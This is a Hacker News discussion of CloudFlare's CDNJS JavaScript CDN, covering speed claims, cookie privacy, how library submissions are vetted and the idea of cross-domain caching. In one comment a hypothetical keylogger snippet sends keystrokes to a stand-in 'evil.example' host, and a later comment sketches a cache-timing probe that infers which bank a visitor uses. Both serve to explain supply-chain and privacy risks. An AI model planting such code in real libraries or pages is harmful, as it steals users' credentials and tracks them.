
CDNJS: The Fastest Javascript Repo on the Web - spahl
http://blog.cloudflare.com/cdnjs-the-fastest-javascript-repo-on-the-web
======
jread
Low latency measured from a handful of Pingdom monitoring nodes sitting in data
centers does not necessarily translate to the "fastest repo on the web". We've
tested CloudFlare since their launch using thousands of real users, and based
on that testing, performance tends to be on the low end compared to traditional
static content CDNs. CloudFlare is more of a website proxy than a CDN; by
taking full control of your website's DNS, it stands out more for add-on
features like security. Here is a link to some real-user performance analysis
I've compiled for various CDNs, including CloudFlare:
<http://dl.dropbox.com/u/20765204/feb12-cdn-report/index.html>

~~~
ksec
I have had a similar experience with CloudFlare. The speed just isn't there;
most CDNs perform MUCH better than they do. I would happily pay for faster
delivery, but that isn't the model they decided to work on. I hope they have
more speed improvements coming soon.

------
nikcub
This shouldn't be hosted on the cloudflare.com domain. Since I am a customer,
every request sends my CloudFlare session cookie and a bunch of Google
Analytics cookies.

Not only does that add 2.5KB of header data to every request, but I don't think
CloudFlare should know which websites its customers have been visiting.

~~~
graue
Yeah, that is an odd decision. Makes you wonder if the “secret” motive of
CloudFlare in hosting this, other than to promote their service, is to track
and analyze your visitors.

I don't see a privacy policy on CDNJS.com. I'd definitely like to know what
data they collect about my visitors and what they do with it.

At least the CDN doesn't itself _set_ any cookies.

~~~
atonse
If anything, this would only affect other CloudFlare users (i.e., people who
have logged in to cloudflare.com). Most visitors won't have any cookies on that
domain.

~~~
bigiain
There's nothing to stop them setting cookies in the responses down the track,
though. Wait until you've got enough users, then one day just switch on your
third-party multi-site user tracking. Or, perhaps less publicly discoverable,
use browser fingerprinting and IP address correlation to do the same thing with
somewhat less accuracy, but completely invisibly.

And note, too, that if you're relying on a third party to serve JavaScript that
your users are going to run in their browsers, and that third party isn't
trustworthy, you're screwed in much worse ways than cookie-tracking privacy
violations. Who'd notice if they started occasionally serving a modified
version of jQuery that sent all form field keydowns (i.e., your usernames and
passwords) back to themselves?
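
To make that concrete, here's a purely hypothetical sketch of the kind of
snippet that could be slipped into an otherwise legitimate library build (the
endpoint is invented; nothing suggests cdnjs serves anything like this):

    // Hypothetical malicious addition to a "trusted" library build:
    // forward every keystroke on the page to a third-party endpoint.
    // 'evil.example' is a made-up host used purely for illustration.
    document.addEventListener('keydown', function (e) {
      var beacon = new Image();
      beacon.src = 'https://evil.example/log?k=' + encodeURIComponent(e.key);
    });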

~~~
atonse
Following the money will especially help in this situation.

How does CloudFlare make its money? It's a CDN company. I mean, that's the
CORE of what they do. What is CDNJS? It's a CDN.

A simpler theory is that hosting a JavaScript CDN (and demonstrating that it's
even better than Google's, which is amazing) is going to provide a lot of free
advertising for their product. If I use their CDN for JS and it works really
well, I'm likely to go back to them for hosting other things, because using
CDNJS is almost like doing a free trial of their actual CDN.

It's not as if their main source of income were in some other industry, where
we'd have to make a cognitive leap to see their ulterior motives. It's
precisely this: CDNs.

------
eric_bullington
For analytics and tag generation for the libraries hosted by CDNJS, take a look
at <http://www.scriptselect.com>. It's a weekend project I did a couple of
weeks ago using d3 and Backbone. You can select libraries, view the size of the
selected libraries, and copy the generated script tags for the libraries you've
selected. Just a little tool to make using CDNJS a bit more convenient. If
there's enough demand, I'll add other CDNs.

Thanks to Ryan, Thomas, and CloudFlare for a very cool service!

------
IanDrake
Quick question... I thought the main benefit of CDN-hosted JS files was that
they were more likely to already be cached on the client, not so much the speed
of delivery.

So wouldn't it be better to go with the most popular CDN rather than the
fastest?

~~~
graue
For jQuery, maybe. But if you're using, say, Backbone, that point is moot
because only CDNJS has it. The Google CDN[1] hosts only 11 libraries; CDNJS
hosts over 200.

[1] <https://developers.google.com/speed/libraries/devguide>

------
scosman
+1 to joshfraser - cache hits always beat requests. I remember seeing a stat
that n% of the top 100 sites use the Google CDN for jQuery; it was by far the
most popular. Stick with Google for the popular libraries.

------
moe
Backing up wild performance claims with a _Pingdom chart_?

I really don't know how anyone can take CloudFlare seriously anymore...

------
po
They say this is 'peer-reviewed', but is that all? If someone sends them a pull
request updating a widely used but perhaps smaller library, will they review
it, or does it just get merged into the CDN? This seems like a good way to get
access to millions of browser sessions. Is anyone at CloudFlare taking
responsibility for checking that the code is coming from the authoritative repo
and not from joeblow/underscore.js?

<https://github.com/cdnjs/cdnjs#pull-requests-steps>

While Google and Microsoft are slower to update their libs, we can assume that
they are downloading releases from official sources.

~~~
thomasfromcdnjs
Contributors generally include links to the official sources.

If not, we track down the official repositories ourselves.

Once we have verified the source, we check the diff between the submitted files
and the official ones. We have flirted with the idea of automating some of
this, but your comment highlights exactly the problem with that kind of
solution, so we are still diff-checking manually for maximum security.
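
As a rough illustration of the kind of check involved (a hypothetical Node
sketch, not our actual tooling; the URL and file names are placeholders):

    // Hypothetical check: download the official release and compare it
    // byte-for-byte against the file submitted in the pull request.
    import { createHash } from 'crypto';
    import { readFileSync } from 'fs';
    import * as https from 'https';

    const officialUrl = 'https://example.org/releases/somelib-1.2.3.min.js'; // from the PR description
    const submittedPath = 'ajax/libs/somelib/1.2.3/somelib.min.js';          // file added by the PR

    const sha256 = (buf: Buffer) => createHash('sha256').update(buf).digest('hex');

    https.get(officialUrl, (res) => {
      const chunks: Buffer[] = [];
      res.on('data', (chunk: Buffer) => { chunks.push(chunk); });
      res.on('end', () => {
        const official = Buffer.concat(chunks);
        const submitted = readFileSync(submittedPath);
        console.log(sha256(official) === sha256(submitted)
          ? 'files match'
          : 'files differ - review the diff by hand');
      });
    });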

------
joshfraser
The fastest request is the one that never happens. One of the biggest benefits
of using hosted libraries is that browsers cache those files locally. By
sharing the same URL for your copy of jQuery with thousands of other sites,
you increase your odds of getting a local browser cache hit. For popular
libraries like jQuery you're probably best off using Google, since they have
the most adoption. That said, I think CloudFlare's CDN is an interesting idea
and could grow into something genuinely useful, especially for less popular
libraries.

------
daemon13
The question I have [but not the answer] is:

Usually every project has a bunch of .js [jQuery, Backbone, etc.] and .css
files, and the accepted good practice is not only to minify and compress them,
but also to bundle some or all of them into a few big combined files to save on
extra HTTP calls.

So my question is: which is better - (1) serving the files separately from such
a CDN [or any public CDN], or (2) combining the files and serving them yourself
via nginx/AWS?

Not a developer, so feel free to correct any mistakes :-)

~~~
joshfraser
It's a great question. The answer depends on a lot of different variables, like
your cache hit ratio, the size and number of files, etc. I'd recommend running
a performance A/B test, using JavaScript to time which option is faster for
your particular site. We offer a free Real User Measurement tool at Torbit
(<http://torbit.com>) that includes the ability to run A/B tests like this.
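
A very rough sketch of what such a test can look like, assuming the server
randomly serves one of the two variants and stamps the page with which one it
chose (the data-variant attribute and collection endpoint here are made up):

    // Hypothetical A/B timing probe: record which variant this page load
    // received and how long it took to reach the load event, then beacon it.
    window.addEventListener('load', function () {
      // e.g. 'cdn-separate-files' or 'self-hosted-bundle', set server-side
      var variant = document.documentElement.getAttribute('data-variant') || 'unknown';
      // milliseconds since navigation began (Navigation Timing API)
      var elapsed = Date.now() - performance.timing.navigationStart;
      var beacon = new Image();
      beacon.src = 'https://stats.example/timing?variant=' + variant + '&ms=' + elapsed;
    });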

------
cypherpunks01
cdnjs is a great public service. I've been using it for various projects for a
while and it seems consistently fast everywhere.

------
atonse
I've recently started using CDNJS for my projects. Thanks to Ryan, Thomas, and
CloudFlare for this awesome service!

I'm even happier to see that you host CSS and images for the common libs. I
will switch my Bootstrap CSS hosting over to yours soon.

------
alexchamberlain
We can still improve this by caching across CDNs.

~~~
byoung2
You mean updating browsers to recognize the same file across different domains
(e.g., by MD5 hash)?

~~~
alexchamberlain
I mean this:
<http://alexchamberlain.co.uk/opinion/2012/09/13/cache-across-domains.html>

~~~
nikcub
The reasons this hasn't been done are:

a) it would require all servers and browsers to be updated for what is a
marginal gain

b) it's a privacy nightmare

~~~
alexchamberlain
a) No it wouldn't; it would be totally optional.

b) Get over it; there is no difference between this and CDNs.

~~~
nikcub
> Get over it; there is no difference between this and CDNs.

Except the part where you can track people across sites.

What I am saying is not speculative: this has been proposed before and shot
down. There is a reason it hasn't happened.

~~~
alexchamberlain
Where would you be tracking people across sites?

~~~
nikcub
If you trawl through the IETF and, more recently, WHATWG mailing lists, you
will find that every time caching comes up - whether with Last-Modified or when
ETag was being ratified - the proposal for cross-origin caching also comes up,
and is rejected.

The browser vendors have just spent the past 4-5 years locking down
cross-origin access in the DOM because of all the security and privacy
implications that come up. Corporate profiles and ISO standards don't even
accept running such code, let alone caching it (I've worked on plenty of
corporate projects where you aren't even allowed to use Google-hosted JS - it
just won't run due to AD policies).

To give just one example of what arises with this new vector: say I were to go
to the top 50 banking sites and take a sample JavaScript file that is unique to
each site. I would then take the hash of each file and, in a single web page,
include a script element referencing each of those hashes. When a visitor hits
that page and the browser attempts to load each script element, if one loads in
4ms then I know the file was already in the cache - and therefore that the
visitor is a customer of that bank.
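
Under such a hypothetical content-addressed caching scheme, the probe could be
as simple as this (the 'content-hash' attribute is imagined purely for
illustration; no real browser supports anything like it):

    // Hypothetical probe against an imagined cross-origin, content-addressed
    // cache: request a resource by hash and infer a cache hit from load time.
    function probeBank(bankName: string, hash: string) {
      var start = Date.now();
      var script = document.createElement('script');
      script.setAttribute('content-hash', hash);       // invented attribute from the proposal
      script.src = 'https://attacker.example/' + hash; // URL is irrelevant if the hash matches
      script.onload = function () {
        if (Date.now() - start < 5) {
          console.log('visitor appears to have ' + bankName + "'s script cached");
        }
      };
      document.head.appendChild(script);
    }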

~~~
alexchamberlain
Why would the banks enable hashing on their unique files? That would be their
security flaw, not a flaw in the design of the system.

~~~
nikcub
Well, that is just one example, and as I mentioned, cross-origin requests and
access have recently been further locked down, not opened up. With all the
different versions and variants of libraries out there, you would be
implementing and exposing a lot to save very little - you wouldn't even save 1%
of web requests. As mentioned, this isn't a new idea; I'm just telling you the
reasons why it hasn't happened and won't.

------
0x006A
Is the Chrome extension[1] working? I was just thinking that I might start
using it if there were a browser extension that makes sure those requests
always stay local. Otherwise it's rather slow to use any remote resource while
developing a page locally.

[1] <https://github.com/cdnjs/browser-extension>
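
Something like this is what I have in mind - a hypothetical sketch of an
extension background script (not the actual cdnjs extension; the localhost
mapping is assumed):

    // Hypothetical background script: intercept cdnjs requests and redirect
    // them to a local mirror while developing. Requires the "webRequest",
    // "webRequestBlocking" and matching host permissions in the manifest.
    chrome.webRequest.onBeforeRequest.addListener(
      function (details) {
        return {
          redirectUrl: details.url.replace(
            /^https?:\/\/cdnjs\.cloudflare\.com\/ajax\/libs\//,
            'http://localhost:8000/libs/' // assumed local copy of the libraries
          )
        };
      },
      { urls: ['*://cdnjs.cloudflare.com/ajax/libs/*'] },
      ['blocking']
    );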

